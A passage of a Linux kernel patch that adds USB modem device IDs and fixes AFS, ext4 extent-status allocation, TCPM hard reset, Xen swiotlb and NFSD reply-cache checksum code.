++/* Luat Air72*U series based on UNISOC UIS8910 uses UNISOC's vendor ID */
++#define LUAT_PRODUCT_AIR720U			0x4e00
+ 
+ /* Device flags */
+ 
+@@ -1546,7 +1548,8 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0165, 0xff, 0xff, 0xff) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0167, 0xff, 0xff, 0xff),
+ 	  .driver_info = RSVD(4) },
+-	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0189, 0xff, 0xff, 0xff) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0189, 0xff, 0xff, 0xff),
++	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0191, 0xff, 0xff, 0xff), /* ZTE EuFi890 */
+ 	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x0196, 0xff, 0xff, 0xff) },
+@@ -2249,6 +2252,7 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(4) | RSVD(5) | RSVD(6) },
+ 	{ USB_DEVICE(0x1782, 0x4d10) },						/* Fibocom L610 (AT mode) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x1782, 0x4d11, 0xff) },			/* Fibocom L610 (ECM/RNDIS mode) */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x2cb7, 0x0001, 0xff, 0xff, 0xff) },	/* Fibocom L716-EU (ECM/RNDIS mode) */
+ 	{ USB_DEVICE(0x2cb7, 0x0104),						/* Fibocom NL678 series */
+ 	  .driver_info = RSVD(4) | RSVD(5) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0105, 0xff),			/* Fibocom NL678 series */
+@@ -2271,6 +2275,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0xff, 0x40) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(SIERRA_VENDOR_ID, SIERRA_PRODUCT_EM9191, 0xff, 0, 0) },
+ 	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, TOZED_PRODUCT_LT70C, 0xff, 0, 0) },
++	{ USB_DEVICE_AND_INTERFACE_INFO(UNISOC_VENDOR_ID, LUAT_PRODUCT_AIR720U, 0xff, 0, 0) },
+ 	{ } /* Terminating entry */
+ };
+ MODULE_DEVICE_TABLE(usb, option_ids);
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 5e9d0c695fdb7..bf615dc8085e9 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -5426,6 +5426,15 @@ static void _tcpm_pd_hard_reset(struct tcpm_port *port)
+ 	if (port->bist_request == BDO_MODE_TESTDATA && port->tcpc->set_bist_data)
+ 		port->tcpc->set_bist_data(port->tcpc, false);
+ 
++	switch (port->state) {
++	case ERROR_RECOVERY:
++	case PORT_RESET:
++	case PORT_RESET_WAIT_OFF:
++		return;
++	default:
++		break;
++	}
++
+ 	if (port->ams != NONE_AMS)
+ 		port->ams = NONE_AMS;
+ 	if (port->hard_reset_count < PD_N_HARD_RESET_COUNT)
+diff --git a/drivers/xen/swiotlb-xen.c b/drivers/xen/swiotlb-xen.c
+index 67aa74d201627..7290f2b402e2a 100644
+--- a/drivers/xen/swiotlb-xen.c
++++ b/drivers/xen/swiotlb-xen.c
+@@ -405,4 +405,5 @@ const struct dma_map_ops xen_swiotlb_dma_ops = {
+ 	.get_sgtable = dma_common_get_sgtable,
+ 	.alloc_pages = dma_common_alloc_pages,
+ 	.free_pages = dma_common_free_pages,
++	.max_mapping_size = swiotlb_max_mapping_size,
+ };
+diff --git a/fs/afs/dynroot.c b/fs/afs/dynroot.c
+index d7d9402ff7182..91e804c70dd0a 100644
+--- a/fs/afs/dynroot.c
++++ b/fs/afs/dynroot.c
+@@ -132,8 +132,8 @@ static int afs_probe_cell_name(struct dentry *dentry)
+ 
+ 	ret = dns_query(net->net, "afsdb", name, len, "srv=1",
+ 			NULL, NULL, false);
+-	if (ret == -ENODATA)
+-		ret = -EDESTADDRREQ;
++	if (ret == -ENODATA || ret == -ENOKEY)
++		ret = -ENOENT;
+ 	return ret;
+ }
+ 
+diff --git a/fs/afs/internal.h b/fs/afs/internal.h
+index 9ba7b68375c9f..c2d70fc1698c0 100644
+--- a/fs/afs/internal.h
++++ b/fs/afs/internal.h
+@@ -552,6 +552,7 @@ struct afs_server_entry {
+ };
+ 
+ struct afs_server_list {
++	struct rcu_head		rcu;
+ 	afs_volid_t		vids[AFS_MAXTYPES]; /* Volume IDs */
+ 	refcount_t		usage;
+ 	unsigned char		nr_servers;
+diff --git a/fs/afs/server_list.c b/fs/afs/server_list.c
+index ed9056703505f..b59896b1de0af 100644
+--- a/fs/afs/server_list.c
++++ b/fs/afs/server_list.c
+@@ -17,7 +17,7 @@ void afs_put_serverlist(struct afs_net *net, struct afs_server_list *slist)
+ 		for (i = 0; i < slist->nr_servers; i++)
+ 			afs_unuse_server(net, slist->servers[i].server,
+ 					 afs_server_trace_put_slist);
+-		kfree(slist);
++		kfree_rcu(slist, rcu);
+ 	}
+ }
+ 
+diff --git a/fs/afs/super.c b/fs/afs/super.c
+index 95d713074dc81..e95fb4cb4fcd2 100644
+--- a/fs/afs/super.c
++++ b/fs/afs/super.c
+@@ -407,6 +407,8 @@ static int afs_validate_fc(struct fs_context *fc)
+ 			return PTR_ERR(volume);
+ 
+ 		ctx->volume = volume;
++		if (volume->type != AFSVL_RWVOL)
++			ctx->flock_mode = afs_flock_mode_local;
+ 	}
+ 
+ 	return 0;
+diff --git a/fs/afs/vl_rotate.c b/fs/afs/vl_rotate.c
+index 488e58490b16e..eb415ce563600 100644
+--- a/fs/afs/vl_rotate.c
++++ b/fs/afs/vl_rotate.c
+@@ -58,6 +58,12 @@ static bool afs_start_vl_iteration(struct afs_vl_cursor *vc)
+ 		}
+ 
+ 		/* Status load is ordered after lookup counter load */
++		if (cell->dns_status == DNS_LOOKUP_GOT_NOT_FOUND) {
++			pr_warn("No record of cell %s\n", cell->name);
++			vc->error = -ENOENT;
++			return false;
++		}
++
+ 		if (cell->dns_source == DNS_RECORD_UNAVAILABLE) {
+ 			vc->error = -EDESTADDRREQ;
+ 			return false;
+@@ -285,6 +291,7 @@ failed:
+  */
+ static void afs_vl_dump_edestaddrreq(const struct afs_vl_cursor *vc)
+ {
++	struct afs_cell *cell = vc->cell;
+ 	static int count;
+ 	int i;
+ 
+@@ -294,6 +301,9 @@ static void afs_vl_dump_edestaddrreq(const struct afs_vl_cursor *vc)
+ 
+ 	rcu_read_lock();
+ 	pr_notice("EDESTADDR occurred\n");
++	pr_notice("CELL: %s err=%d\n", cell->name, cell->error);
++	pr_notice("DNS: src=%u st=%u lc=%x\n",
++		  cell->dns_source, cell->dns_status, cell->dns_lookup_count);
+ 	pr_notice("VC: ut=%lx ix=%u ni=%hu fl=%hx err=%hd\n",
+ 		  vc->untried, vc->index, vc->nr_iterations, vc->flags, vc->error);
+ 
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index b57e497679ef9..470d29fb407a5 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -144,14 +144,17 @@
+ static struct kmem_cache *ext4_es_cachep;
+ static struct kmem_cache *ext4_pending_cachep;
+ 
+-static int __es_insert_extent(struct inode *inode, struct extent_status *newes);
++static int __es_insert_extent(struct inode *inode, struct extent_status *newes,
++			      struct extent_status *prealloc);
+ static int __es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+-			      ext4_lblk_t end, int *reserved);
++			      ext4_lblk_t end, int *reserved,
++			      struct extent_status *prealloc);
+ static int es_reclaim_extents(struct ext4_inode_info *ei, int *nr_to_scan);
+ static int __es_shrink(struct ext4_sb_info *sbi, int nr_to_scan,
+ 		       struct ext4_inode_info *locked_ei);
+-static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+-			     ext4_lblk_t len);
++static int __revise_pending(struct inode *inode, ext4_lblk_t lblk,
++			    ext4_lblk_t len,
++			    struct pending_reservation **prealloc);
+ 
+ int __init ext4_init_es(void)
+ {
+@@ -448,22 +451,49 @@ static void ext4_es_list_del(struct inode *inode)
+ 	spin_unlock(&sbi->s_es_lock);
+ }
+ 
+-static struct extent_status *
+-ext4_es_alloc_extent(struct inode *inode, ext4_lblk_t lblk, ext4_lblk_t len,
+-		     ext4_fsblk_t pblk)
++static inline struct pending_reservation *__alloc_pending(bool nofail)
++{
++	if (!nofail)
++		return kmem_cache_alloc(ext4_pending_cachep, GFP_ATOMIC);
++
++	return kmem_cache_zalloc(ext4_pending_cachep, GFP_KERNEL | __GFP_NOFAIL);
++}
++
++static inline void __free_pending(struct pending_reservation *pr)
++{
++	kmem_cache_free(ext4_pending_cachep, pr);
++}
++
++/*
++ * Returns true if we cannot fail to allocate memory for this extent_status
++ * entry and cannot reclaim it until its status changes.
++ */
++static inline bool ext4_es_must_keep(struct extent_status *es)
++{
++	/* fiemap, bigalloc, and seek_data/hole need to use it. */
++	if (ext4_es_is_delayed(es))
++		return true;
++
++	return false;
++}
++
++static inline struct extent_status *__es_alloc_extent(bool nofail)
++{
++	if (!nofail)
++		return kmem_cache_alloc(ext4_es_cachep, GFP_ATOMIC);
++
++	return kmem_cache_zalloc(ext4_es_cachep, GFP_KERNEL | __GFP_NOFAIL);
++}
++
++static void ext4_es_init_extent(struct inode *inode, struct extent_status *es,
++		ext4_lblk_t lblk, ext4_lblk_t len, ext4_fsblk_t pblk)
+ {
+-	struct extent_status *es;
+-	es = kmem_cache_alloc(ext4_es_cachep, GFP_ATOMIC);
+-	if (es == NULL)
+-		return NULL;
+ 	es->es_lblk = lblk;
+ 	es->es_len = len;
+ 	es->es_pblk = pblk;
+ 
+-	/*
+-	 * We don't count delayed extent because we never try to reclaim them
+-	 */
+-	if (!ext4_es_is_delayed(es)) {
++	/* We never try to reclaim a must kept extent, so we don't count it. */
++	if (!ext4_es_must_keep(es)) {
+ 		if (!EXT4_I(inode)->i_es_shk_nr++)
+ 			ext4_es_list_add(inode);
+ 		percpu_counter_inc(&EXT4_SB(inode->i_sb)->
+@@ -472,8 +502,11 @@ ext4_es_alloc_extent(struct inode *inode, ext4_lblk_t lblk, ext4_lblk_t len,
+ 
+ 	EXT4_I(inode)->i_es_all_nr++;
+ 	percpu_counter_inc(&EXT4_SB(inode->i_sb)->s_es_stats.es_stats_all_cnt);
++}
+ 
+-	return es;
++static inline void __es_free_extent(struct extent_status *es)
++{
++	kmem_cache_free(ext4_es_cachep, es);
+ }
+ 
+ static void ext4_es_free_extent(struct inode *inode, struct extent_status *es)
+@@ -481,8 +514,8 @@ static void ext4_es_free_extent(struct inode *inode, struct extent_status *es)
+ 	EXT4_I(inode)->i_es_all_nr--;
+ 	percpu_counter_dec(&EXT4_SB(inode->i_sb)->s_es_stats.es_stats_all_cnt);
+ 
+-	/* Decrease the shrink counter when this es is not delayed */
+-	if (!ext4_es_is_delayed(es)) {
++	/* Decrease the shrink counter when we can reclaim the extent. */
++	if (!ext4_es_must_keep(es)) {
+ 		BUG_ON(EXT4_I(inode)->i_es_shk_nr == 0);
+ 		if (!--EXT4_I(inode)->i_es_shk_nr)
+ 			ext4_es_list_del(inode);
+@@ -490,7 +523,7 @@ static void ext4_es_free_extent(struct inode *inode, struct extent_status *es)
+ 					s_es_stats.es_stats_shk_cnt);
+ 	}
+ 
+-	kmem_cache_free(ext4_es_cachep, es);
++	__es_free_extent(es);
+ }
+ 
+ /*
+@@ -751,7 +784,8 @@ static inline void ext4_es_insert_extent_check(struct inode *inode,
+ }
+ #endif
+ 
+-static int __es_insert_extent(struct inode *inode, struct extent_status *newes)
++static int __es_insert_extent(struct inode *inode, struct extent_status *newes,
++			      struct extent_status *prealloc)
+ {
+ 	struct ext4_es_tree *tree = &EXT4_I(inode)->i_es_tree;
+ 	struct rb_node **p = &tree->root.rb_node;
+@@ -791,10 +825,15 @@ static int __es_insert_extent(struct inode *inode, struct extent_status *newes)
+ 		}
+ 	}
+ 
+-	es = ext4_es_alloc_extent(inode, newes->es_lblk, newes->es_len,
+-				  newes->es_pblk);
++	if (prealloc)
++		es = prealloc;
++	else
++		es = __es_alloc_extent(false);
+ 	if (!es)
+ 		return -ENOMEM;
++	ext4_es_init_extent(inode, es, newes->es_lblk, newes->es_len,
++			    newes->es_pblk);
++
+ 	rb_link_node(&es->rb_node, parent, p);
+ 	rb_insert_color(&es->rb_node, &tree->root);
+ 
+@@ -815,8 +854,12 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ {
+ 	struct extent_status newes;
+ 	ext4_lblk_t end = lblk + len - 1;
+-	int err = 0;
++	int err1 = 0, err2 = 0, err3 = 0;
+ 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
++	struct extent_status *es1 = NULL;
++	struct extent_status *es2 = NULL;
++	struct pending_reservation *pr = NULL;
++	bool revise_pending = false;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return 0;
+@@ -844,29 +887,57 @@ int ext4_es_insert_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	ext4_es_insert_extent_check(inode, &newes);
+ 
++	revise_pending = sbi->s_cluster_ratio > 1 &&
++			 test_opt(inode->i_sb, DELALLOC) &&
++			 (status & (EXTENT_STATUS_WRITTEN |
++				    EXTENT_STATUS_UNWRITTEN));
++retry:
++	if (err1 && !es1)
++		es1 = __es_alloc_extent(true);
++	if ((err1 || err2) && !es2)
++		es2 = __es_alloc_extent(true);
++	if ((err1 || err2 || err3) && revise_pending && !pr)
++		pr = __alloc_pending(true);
+ 	write_lock(&EXT4_I(inode)->i_es_lock);
+-	err = __es_remove_extent(inode, lblk, end, NULL);
+-	if (err != 0)
++
++	err1 = __es_remove_extent(inode, lblk, end, NULL, es1);
++	if (err1 != 0)
+ 		goto error;
+-retry:
+-	err = __es_insert_extent(inode, &newes);
+-	if (err == -ENOMEM && __es_shrink(EXT4_SB(inode->i_sb),
+-					  128, EXT4_I(inode)))
+-		goto retry;
+-	if (err == -ENOMEM && !ext4_es_is_delayed(&newes))
+-		err = 0;
++	/* Free preallocated extent if it didn't get used. */
++	if (es1) {
++		if (!es1->es_len)
++			__es_free_extent(es1);
++		es1 = NULL;
++	}
+ 
+-	if (sbi->s_cluster_ratio > 1 && test_opt(inode->i_sb, DELALLOC) &&
+-	    (status & EXTENT_STATUS_WRITTEN ||
+-	     status & EXTENT_STATUS_UNWRITTEN))
+-		__revise_pending(inode, lblk, len);
++	err2 = __es_insert_extent(inode, &newes, es2);
++	if (err2 == -ENOMEM && !ext4_es_must_keep(&newes))
++		err2 = 0;
++	if (err2 != 0)
++		goto error;
++	/* Free preallocated extent if it didn't get used. */
++	if (es2) {
++		if (!es2->es_len)
++			__es_free_extent(es2);
++		es2 = NULL;
++	}
+ 
++	if (revise_pending) {
++		err3 = __revise_pending(inode, lblk, len, &pr);
++		if (err3 != 0)
++			goto error;
++		if (pr) {
++			__free_pending(pr);
++			pr = NULL;
++		}
++	}
+ error:
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
++	if (err1 || err2 || err3)
++		goto retry;
+ 
+ 	ext4_es_print_tree(inode);
+-
+-	return err;
++	return 0;
+ }
+ 
+ /*
+@@ -899,7 +970,7 @@ void ext4_es_cache_extent(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	es = __es_tree_search(&EXT4_I(inode)->i_es_tree.root, lblk);
+ 	if (!es || es->es_lblk > end)
+-		__es_insert_extent(inode, &newes);
++		__es_insert_extent(inode, &newes, NULL);
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
+ }
+ 
+@@ -1270,7 +1341,7 @@ static unsigned int get_rsvd(struct inode *inode, ext4_lblk_t end,
+ 				rc->ndelonly--;
+ 				node = rb_next(&pr->rb_node);
+ 				rb_erase(&pr->rb_node, &tree->root);
+-				kmem_cache_free(ext4_pending_cachep, pr);
++				__free_pending(pr);
+ 				if (!node)
+ 					break;
+ 				pr = rb_entry(node, struct pending_reservation,
+@@ -1289,6 +1360,7 @@ static unsigned int get_rsvd(struct inode *inode, ext4_lblk_t end,
+  * @lblk - first block in range
+  * @end - last block in range
+  * @reserved - number of cluster reservations released
++ * @prealloc - pre-allocated es to avoid memory allocation failures
+  *
+  * If @reserved is not NULL and delayed allocation is enabled, counts
+  * block/cluster reservations freed by removing range and if bigalloc
+@@ -1296,7 +1368,8 @@ static unsigned int get_rsvd(struct inode *inode, ext4_lblk_t end,
+  * error code on failure.
+  */
+ static int __es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+-			      ext4_lblk_t end, int *reserved)
++			      ext4_lblk_t end, int *reserved,
++			      struct extent_status *prealloc)
+ {
+ 	struct ext4_es_tree *tree = &EXT4_I(inode)->i_es_tree;
+ 	struct rb_node *node;
+@@ -1304,14 +1377,12 @@ static int __es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	struct extent_status orig_es;
+ 	ext4_lblk_t len1, len2;
+ 	ext4_fsblk_t block;
+-	int err;
++	int err = 0;
+ 	bool count_reserved = true;
+ 	struct rsvd_count rc;
+ 
+ 	if (reserved == NULL || !test_opt(inode->i_sb, DELALLOC))
+ 		count_reserved = false;
+-retry:
+-	err = 0;
+ 
+ 	es = __es_tree_search(&tree->root, lblk);
+ 	if (!es)
+@@ -1345,14 +1416,13 @@ retry:
+ 					orig_es.es_len - len2;
+ 			ext4_es_store_pblock_status(&newes, block,
+ 						    ext4_es_status(&orig_es));
+-			err = __es_insert_extent(inode, &newes);
++			err = __es_insert_extent(inode, &newes, prealloc);
+ 			if (err) {
++				if (!ext4_es_must_keep(&newes))
++					return 0;
++
+ 				es->es_lblk = orig_es.es_lblk;
+ 				es->es_len = orig_es.es_len;
+-				if ((err == -ENOMEM) &&
+-				    __es_shrink(EXT4_SB(inode->i_sb),
+-							128, EXT4_I(inode)))
+-					goto retry;
+ 				goto out;
+ 			}
+ 		} else {
+@@ -1432,6 +1502,7 @@ int ext4_es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	ext4_lblk_t end;
+ 	int err = 0;
+ 	int reserved = 0;
++	struct extent_status *es = NULL;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return 0;
+@@ -1446,17 +1517,29 @@ int ext4_es_remove_extent(struct inode *inode, ext4_lblk_t lblk,
+ 	end = lblk + len - 1;
+ 	BUG_ON(end < lblk);
+ 
++retry:
++	if (err && !es)
++		es = __es_alloc_extent(true);
+ 	/*
+ 	 * ext4_clear_inode() depends on us taking i_es_lock unconditionally
+ 	 * so that we are sure __es_shrink() is done with the inode before it
+ 	 * is reclaimed.
+ 	 */
+ 	write_lock(&EXT4_I(inode)->i_es_lock);
+-	err = __es_remove_extent(inode, lblk, end, &reserved);
++	err = __es_remove_extent(inode, lblk, end, &reserved, es);
++	/* Free preallocated extent if it didn't get used. */
++	if (es) {
++		if (!es->es_len)
++			__es_free_extent(es);
++		es = NULL;
++	}
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
++	if (err)
++		goto retry;
++
+ 	ext4_es_print_tree(inode);
+ 	ext4_da_release_space(inode, reserved);
+-	return err;
++	return 0;
+ }
+ 
+ static int __es_shrink(struct ext4_sb_info *sbi, int nr_to_scan,
+@@ -1704,11 +1787,8 @@ static int es_do_reclaim_extents(struct ext4_inode_info *ei, ext4_lblk_t end,
+ 
+ 		(*nr_to_scan)--;
+ 		node = rb_next(&es->rb_node);
+-		/*
+-		 * We can't reclaim delayed extent from status tree because
+-		 * fiemap, bigallic, and seek_data/hole need to use it.
+-		 */
+-		if (ext4_es_is_delayed(es))
++
++		if (ext4_es_must_keep(es))
+ 			goto next;
+ 		if (ext4_es_is_referenced(es)) {
+ 			ext4_es_clear_referenced(es);
+@@ -1772,7 +1852,7 @@ void ext4_clear_inode_es(struct inode *inode)
+ 	while (node) {
+ 		es = rb_entry(node, struct extent_status, rb_node);
+ 		node = rb_next(node);
+-		if (!ext4_es_is_delayed(es)) {
++		if (!ext4_es_must_keep(es)) {
+ 			rb_erase(&es->rb_node, &tree->root);
+ 			ext4_es_free_extent(inode, es);
+ 		}
+@@ -1859,11 +1939,13 @@ static struct pending_reservation *__get_pending(struct inode *inode,
+  *
+  * @inode - file containing the cluster
+  * @lblk - logical block in the cluster to be added
++ * @prealloc - preallocated pending entry
+  *
+  * Returns 0 on successful insertion and -ENOMEM on failure.  If the
+  * pending reservation is already in the set, returns successfully.
+  */
+-static int __insert_pending(struct inode *inode, ext4_lblk_t lblk)
++static int __insert_pending(struct inode *inode, ext4_lblk_t lblk,
++			    struct pending_reservation **prealloc)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
+ 	struct ext4_pending_tree *tree = &EXT4_I(inode)->i_pending_tree;
+@@ -1889,10 +1971,15 @@ static int __insert_pending(struct inode *inode, ext4_lblk_t lblk)
+ 		}
+ 	}
+ 
+-	pr = kmem_cache_alloc(ext4_pending_cachep, GFP_ATOMIC);
+-	if (pr == NULL) {
+-		ret = -ENOMEM;
+-		goto out;
++	if (likely(*prealloc == NULL)) {
++		pr = __alloc_pending(false);
++		if (!pr) {
++			ret = -ENOMEM;
++			goto out;
++		}
++	} else {
++		pr = *prealloc;
++		*prealloc = NULL;
+ 	}
+ 	pr->lclu = lclu;
+ 
+@@ -1922,7 +2009,7 @@ static void __remove_pending(struct inode *inode, ext4_lblk_t lblk)
+ 	if (pr != NULL) {
+ 		tree = &EXT4_I(inode)->i_pending_tree;
+ 		rb_erase(&pr->rb_node, &tree->root);
+-		kmem_cache_free(ext4_pending_cachep, pr);
++		__free_pending(pr);
+ 	}
+ }
+ 
+@@ -1983,7 +2070,10 @@ int ext4_es_insert_delayed_block(struct inode *inode, ext4_lblk_t lblk,
+ 				 bool allocated)
+ {
+ 	struct extent_status newes;
+-	int err = 0;
++	int err1 = 0, err2 = 0, err3 = 0;
++	struct extent_status *es1 = NULL;
++	struct extent_status *es2 = NULL;
++	struct pending_reservation *pr = NULL;
+ 
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return 0;
+@@ -1998,29 +2088,52 @@ int ext4_es_insert_delayed_block(struct inode *inode, ext4_lblk_t lblk,
+ 
+ 	ext4_es_insert_extent_check(inode, &newes);
+ 
++retry:
++	if (err1 && !es1)
++		es1 = __es_alloc_extent(true);
++	if ((err1 || err2) && !es2)
++		es2 = __es_alloc_extent(true);
++	if ((err1 || err2 || err3) && allocated && !pr)
++		pr = __alloc_pending(true);
+ 	write_lock(&EXT4_I(inode)->i_es_lock);
+ 
+-	err = __es_remove_extent(inode, lblk, lblk, NULL);
+-	if (err != 0)
+-		goto error;
+-retry:
+-	err = __es_insert_extent(inode, &newes);
+-	if (err == -ENOMEM && __es_shrink(EXT4_SB(inode->i_sb),
+-					  128, EXT4_I(inode)))
+-		goto retry;
+-	if (err != 0)
++	err1 = __es_remove_extent(inode, lblk, lblk, NULL, es1);
++	if (err1 != 0)
+ 		goto error;
++	/* Free preallocated extent if it didn't get used. */
++	if (es1) {
++		if (!es1->es_len)
++			__es_free_extent(es1);
++		es1 = NULL;
++	}
+ 
+-	if (allocated)
+-		__insert_pending(inode, lblk);
++	err2 = __es_insert_extent(inode, &newes, es2);
++	if (err2 != 0)
++		goto error;
++	/* Free preallocated extent if it didn't get used. */
++	if (es2) {
++		if (!es2->es_len)
++			__es_free_extent(es2);
++		es2 = NULL;
++	}
+ 
++	if (allocated) {
++		err3 = __insert_pending(inode, lblk, &pr);
++		if (err3 != 0)
++			goto error;
++		if (pr) {
++			__free_pending(pr);
++			pr = NULL;
++		}
++	}
+ error:
+ 	write_unlock(&EXT4_I(inode)->i_es_lock);
++	if (err1 || err2 || err3)
++		goto retry;
+ 
+ 	ext4_es_print_tree(inode);
+ 	ext4_print_pending_tree(inode);
+-
+-	return err;
++	return 0;
+ }
+ 
+ /*
+@@ -2121,21 +2234,24 @@ unsigned int ext4_es_delayed_clu(struct inode *inode, ext4_lblk_t lblk,
+  * @inode - file containing the range
+  * @lblk - logical block defining the start of range
+  * @len  - length of range in blocks
++ * @prealloc - preallocated pending entry
+  *
+  * Used after a newly allocated extent is added to the extents status tree.
+  * Requires that the extents in the range have either written or unwritten
+  * status.  Must be called while holding i_es_lock.
+  */
+-static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+-			     ext4_lblk_t len)
++static int __revise_pending(struct inode *inode, ext4_lblk_t lblk,
++			    ext4_lblk_t len,
++			    struct pending_reservation **prealloc)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(inode->i_sb);
+ 	ext4_lblk_t end = lblk + len - 1;
+ 	ext4_lblk_t first, last;
+ 	bool f_del = false, l_del = false;
++	int ret = 0;
+ 
+ 	if (len == 0)
+-		return;
++		return 0;
+ 
+ 	/*
+ 	 * Two cases - block range within single cluster and block range
+@@ -2156,7 +2272,9 @@ static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+ 			f_del = __es_scan_range(inode, &ext4_es_is_delonly,
+ 						first, lblk - 1);
+ 		if (f_del) {
+-			__insert_pending(inode, first);
++			ret = __insert_pending(inode, first, prealloc);
++			if (ret < 0)
++				goto out;
+ 		} else {
+ 			last = EXT4_LBLK_CMASK(sbi, end) +
+ 			       sbi->s_cluster_ratio - 1;
+@@ -2164,9 +2282,11 @@ static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+ 				l_del = __es_scan_range(inode,
+ 							&ext4_es_is_delonly,
+ 							end + 1, last);
+-			if (l_del)
+-				__insert_pending(inode, last);
+-			else
++			if (l_del) {
++				ret = __insert_pending(inode, last, prealloc);
++				if (ret < 0)
++					goto out;
++			} else
+ 				__remove_pending(inode, last);
+ 		}
+ 	} else {
+@@ -2174,18 +2294,24 @@ static void __revise_pending(struct inode *inode, ext4_lblk_t lblk,
+ 		if (first != lblk)
+ 			f_del = __es_scan_range(inode, &ext4_es_is_delonly,
+ 						first, lblk - 1);
+-		if (f_del)
+-			__insert_pending(inode, first);
+-		else
++		if (f_del) {
++			ret = __insert_pending(inode, first, prealloc);
++			if (ret < 0)
++				goto out;
++		} else
+ 			__remove_pending(inode, first);
+ 
+ 		last = EXT4_LBLK_CMASK(sbi, end) + sbi->s_cluster_ratio - 1;
+ 		if (last != end)
+ 			l_del = __es_scan_range(inode, &ext4_es_is_delonly,
+ 						end + 1, last);
+-		if (l_del)
+-			__insert_pending(inode, last);
+-		else
++		if (l_del) {
++			ret = __insert_pending(inode, last, prealloc);
++			if (ret < 0)
++				goto out;
++		} else
+ 			__remove_pending(inode, last);
+ 	}
++out:
++	return ret;
+ }
+diff --git a/fs/nfsd/cache.h b/fs/nfsd/cache.h
+index f21259ead64bb..3c07d587ae9e9 100644
+--- a/fs/nfsd/cache.h
++++ b/fs/nfsd/cache.h
+@@ -82,7 +82,8 @@ int	nfsd_drc_slab_create(void);
+ void	nfsd_drc_slab_free(void);
+ int	nfsd_reply_cache_init(struct nfsd_net *);
+ void	nfsd_reply_cache_shutdown(struct nfsd_net *);
+-int	nfsd_cache_lookup(struct svc_rqst *);
++int	nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
++			  unsigned int len);
+ void	nfsd_cache_update(struct svc_rqst *, int, __be32 *);
+ int	nfsd_reply_cache_stats_show(struct seq_file *m, void *v);
+ 
+diff --git a/fs/nfsd/nfscache.c b/fs/nfsd/nfscache.c
+index 3e64a3d50a1c5..f53335ae0ab22 100644
+--- a/fs/nfsd/nfscache.c
++++ b/fs/nfsd/nfscache.c
+@@ -311,33 +311,53 @@ nfsd_reply_cache_scan(struct shrinker *shrink, struct shrink_control *sc)
+ 
+ 	return prune_cache_entries(nn);
+ }
+-/*
+- * Walk an xdr_buf and get a CRC for at most the first RC_CSUMLEN bytes
++
++/**
++ * nfsd_cache_csum - Checksum incoming NFS Call arguments
++ * @buf: buffer containing a whole RPC Call message
++ * @start: starting byte of the NFS Call header
++ * @remaining: size of the NFS Call header, in bytes
++ *
++ * Compute a weak checksum of the leading bytes of an NFS procedure
++ * call header to help verify that a retransmitted Call matches an
++ * entry in the duplicate reply cache.
++ *
++ * To avoid assumptions about how the RPC message is laid out in
++ * @buf and what else it might contain (eg, a GSS MIC suffix), the
++ * caller passes us the exact location and length of the NFS Call
++ * header.
++ *
++ * Returns a 32-bit checksum value, as defined in RFC 793.
+  */
+-static __wsum
+-nfsd_cache_csum(struct svc_rqst *rqstp)
++static __wsum nfsd_cache_csum(struct xdr_buf *buf, unsigned int start,
++			      unsigned int remaining)
+ {
++	unsigned int base, len;
++	struct xdr_buf subbuf;
++	__wsum csum = 0;
++	void *p;
+ 	int idx;
+-	unsigned int base;
+-	__wsum csum;
+-	struct xdr_buf *buf = &rqstp->rq_arg;
+-	const unsigned char *p = buf->head[0].iov_base;
+-	size_t csum_len = min_t(size_t, buf->head[0].iov_len + buf->page_len,
+-				RC_CSUMLEN);
+-	size_t len = min(buf->head[0].iov_len, csum_len);
++
++	if (remaining > RC_CSUMLEN)
++		remaining = RC_CSUMLEN;
++	if (xdr_buf_subsegment(buf, &subbuf, start, remaining))
++		return csum;
+ 
+ 	/* rq_arg.head first */
